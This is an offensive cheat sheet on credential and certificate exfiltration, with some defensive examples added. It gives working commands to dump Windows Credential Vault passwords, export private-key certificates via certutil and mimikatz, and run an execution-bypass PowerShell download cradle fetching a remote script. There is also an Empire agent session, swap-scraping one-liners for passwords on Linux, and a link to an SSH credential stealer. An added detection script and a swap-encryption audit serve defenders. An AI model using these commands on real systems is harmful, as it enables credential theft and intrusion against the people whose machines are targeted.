# Exfiltration
## Windows
Credentials from IE and Edge:
```powershell
# Usage: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')"
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
```
Listing Certificates:
```powershell
Get-ChildItem -Path 'Cert:\CurrentUser\My'
```
Dumping Certificates:
```powershell
Get-ChildItem -Path 'Cert:\CurrentUser\My' | Where-Object { $_.hasPrivateKey } | Foreach-Object { certutil.exe @('-exportpfx', '-p', 'secret', $_.Thumbprint, "$($_.Subject).pfx") }
```
Example session (listing the user store from an Empire agent, then exporting one certificate by thumbprint):

```
(Empire: PBDGVXBKMKM3VRTH) > shell Get-ChildItem -Path 'Cert:\CurrentUser\My'
(Empire: PBDGVXBKMKM3VRTH) >
Directory: Microsoft.PowerShell.Security\Certificate::CurrentUser\My
Thumbprint Subject
---------- -------
9F76F10EC329C4365ACC72E7BDC3A13AF5F0C3CA CN=user1@corp.com
74B8E1DE4D2CD35A242FC3452E0EE73FDFBE1A6A CN=911259, OU=People, O=Group
714B276BE0EB8C6B19157691899CC4CCA2F0B265 CN=2014-2029 Dev Root, O=Dev
708411B08CA25B987B94E229D50E1862DCDDACF8 CN=user2@corp.com
6FCDF1A4DF6DA730386D6DD1041D41618A7E08FB CN=CC2 Dev Team, OU=iOS, OU=BYOD, OU=CIB, O=Group
66379C02D31D081574746B2FB95AF6ABF6D9740D CN=911259, OU=People, O=Group
58369F020338A78D2B3A043F2963448A24A4ED97 CN=user3@corp.com
4FD61287C53BD30F12A90B1851ED35FF021EC5F0 CN=911259, OU=People, O=Group
3D3E74F2F1132FB82584D762FDFBD849524A0EAB CN=2014-2029 Dev Mobile Devices, O=Dev
30089099A9717A5D7FA685F6FA53434B3BD07BF9 CN=911259, OU=People, O=Group
certutil.exe -exportpfx 9F76F10EC329C4365ACC72E7BDC3A13AF5F0C3CA foo.pfx
```
Dumping certificates from the machine store (Empire mimikatz module, Invoke-Mimikatz, or the mimikatz console):

```
(Empire: credentials/mimikatz/command) > set Command crypto::capi privilege::debug crypto::cng "crypto::certificates"
Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"'
crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"
Get-ChildItem -Path 'Cert:\localmachine\My' | Where-Object { $_.hasPrivateKey } | Foreach-Object { &certutil.exe @('-exportpfx', '-p', 'secret', $_.Thumbprint, "$($_.Subject).pfx") }
set Command crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"
set Command crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:my /export"
privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"
```
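From the defender's side, every command in this section leaves a process-creation record with a distinctive command line. The following detection example is added to this page and is not part of the original cheat sheet or of any tool it names: it parses a constructed `timestamp|user|image|command line` log (a simplified Sysmon Event ID 1 / Security 4688 shape; `parse_line()` is the only part you need to adapt for a real export) and flags the certutil PFX export, the PasswordVault dump, the mimikatz `crypto::` module and the execution-policy-bypass download cradle shown above. The rule names and the sample events are mine.

```python
"""Detection example added to this page (not from the original cheat sheet):
scan process-creation telemetry for the certificate- and credential-dumping
command lines shown in the Windows section. Log format and events are
constructed for the example; adapt parse_line() to your own export format."""
import re
from dataclasses import dataclass

# Constructed sample events: timestamp|user|image|command line (not real data).
SAMPLE_LOG = r"""
2024-05-01T10:02:11Z|CORP\user1|C:\Windows\System32\certutil.exe|certutil.exe -exportpfx -p secret 9F76F10EC329C4365ACC72E7BDC3A13AF5F0C3CA user1.pfx
2024-05-01T10:03:40Z|CORP\user1|C:\Windows\System32\certutil.exe|certutil.exe -hashfile setup.msi SHA256
2024-05-01T10:05:02Z|CORP\svc_web|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload')"
2024-05-01T10:06:15Z|CORP\user2|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "$v = New-Object Windows.Security.Credentials.PasswordVault; $v.RetrieveAll() | % { $_.RetrievePassword(); $_ }"
2024-05-01T10:07:30Z|CORP\admin|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:my /export"'
2024-05-01T10:08:00Z|CORP\user3|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "Get-ChildItem -Path 'Cert:\CurrentUser\My'"
"""

# Each rule: (name, regex applied to the command line, why it matters).
# Rule names are assumptions made for this example, not a vendor taxonomy.
RULES = [
    ("certutil_pfx_export",
     re.compile(r"\bcertutil(\.exe)?\b.*-exportpfx", re.I),
     "certutil exporting a certificate together with its private key"),
    ("passwordvault_dump",
     re.compile(r"PasswordVault.*RetrieveAll|RetrievePassword\(\)", re.I),
     "Credential Vault enumerated with stored passwords revealed"),
    ("mimikatz_crypto",
     re.compile(r"crypto::(capi|cng|certificates)|privilege::debug", re.I),
     "mimikatz crypto module or debug privilege requested"),
    ("ps_download_cradle",
     re.compile(r"-exec(utionpolicy)?\s+bypass.*\bIEX\b.*DownloadString", re.I),
     "PowerShell download cradle with execution-policy bypass"),
]


@dataclass
class Hit:
    timestamp: str
    user: str
    rule: str
    reason: str
    command_line: str


def parse_line(line):
    """Split one constructed record into its four fields; None if malformed."""
    parts = line.split("|", 3)
    if len(parts) != 4:
        return None
    return dict(zip(("timestamp", "user", "image", "command_line"), parts))


def scan(log_text):
    """Return a Hit for every (event, rule) pair whose command line matches."""
    hits = []
    for raw in log_text.splitlines():
        event = parse_line(raw)
        if event is None:
            continue
        for name, pattern, reason in RULES:
            if pattern.search(event["command_line"]):
                hits.append(Hit(event["timestamp"], event["user"], name,
                                reason, event["command_line"]))
    return hits


def users_by_rule(hits):
    """Group the users seen per rule: a quick triage summary for an analyst."""
    summary = {}
    for h in hits:
        summary.setdefault(h.rule, set()).add(h.user)
    return summary


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.timestamp} {h.user:<14} {h.rule:<20} {h.reason}")
```

The benign `certutil -hashfile` and the plain `Get-ChildItem Cert:\` listing are deliberately left unflagged: listing the store is normal administration, while `-exportpfx`, `crypto::certificates /export` and `RetrieveAll()` are the steps that actually move key material. Pair the rule with an allow-list for your PKI enrolment hosts, where certutil exports are expected.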
## Linux
Get Creds from Swap:
```shell
strings <swap_device> | grep "&password="
strings <swap_device> | grep -i 'email=' | grep @ | uniq
# etc...
```
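Secrets end up in swap because the kernel pages out process memory that held them; the mitigation is to swap only onto encrypted devices (a random-key dm-crypt mapping in `/etc/crypttab`) or not at all. The audit below is an example added to this page, not part of the original cheat sheet: it reads `/proc/swaps`-style and `/etc/crypttab`-style text and reports which active swap areas are not backed by a crypttab mapping. Both inputs here are constructed; pass the real file contents to `audit()` on a host to check it.

```python
"""Swap audit added to this page (not from the original cheat sheet): report
active swap areas that are not dm-crypt mappings declared in /etc/crypttab.
The two sample inputs are constructed for the example."""

# Constructed /proc/swaps content (tab-separated like the real file).
SAMPLE_PROC_SWAPS = """\
Filename\t\t\t\tType\t\tSize\tUsed\tPriority
/dev/sda3                               partition\t8388604\t0\t-2
/dev/mapper/cryptswap1                  partition\t4194300\t0\t-3
/swapfile                               file\t\t2097148\t0\t-4
"""

# Constructed /etc/crypttab: cryptswap1 is a random-key swap mapping,
# cryptroot is a LUKS volume that is not a swap device.
SAMPLE_CRYPTTAB = """\
# <target name> <source device> <key file> <options>
cryptswap1 /dev/sda4 /dev/urandom swap,cipher=aes-xts-plain64,size=256
cryptroot  UUID=00000000-0000-0000-0000-000000000000 none luks
"""


def parse_proc_swaps(text):
    """Return (filename, type) for each active swap area, skipping the header."""
    areas = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 2:
            areas.append((fields[0], fields[1]))
    return areas


def crypttab_targets(text):
    """Return the set of mapping names (first column) declared in crypttab."""
    targets = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        targets.add(line.split()[0])
    return targets


def classify_swap(areas, targets):
    """Map each swap path to 'encrypted' (a /dev/mapper name from crypttab),
    'plaintext' (any other block device) or 'file' (a swap file, which is only
    as protected as the filesystem holding it, so check that separately)."""
    result = {}
    for path, kind in areas:
        if kind == "file":
            result[path] = "file"
        elif path.startswith("/dev/mapper/") and path.rsplit("/", 1)[1] in targets:
            result[path] = "encrypted"
        else:
            result[path] = "plaintext"
    return result


def audit(proc_swaps_text, crypttab_text):
    """Convenience wrapper: parse both inputs and classify every swap area."""
    return classify_swap(parse_proc_swaps(proc_swaps_text),
                         crypttab_targets(crypttab_text))


if __name__ == "__main__":
    for path, status in audit(SAMPLE_PROC_SWAPS, SAMPLE_CRYPTTAB).items():
        print(f"{status:<10} {path}")
```

Anything reported as `plaintext` is exactly the `<swap_device>` the `strings` one-liners above would be run against. A mapping that appears as `/dev/dm-N` rather than `/dev/mapper/<name>` in `/proc/swaps` is reported as `plaintext` by this simplified check; resolve it with `dmsetup info` before acting on the result.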
Get Creds from SSH sessions:
https://github.com/blendin/3snake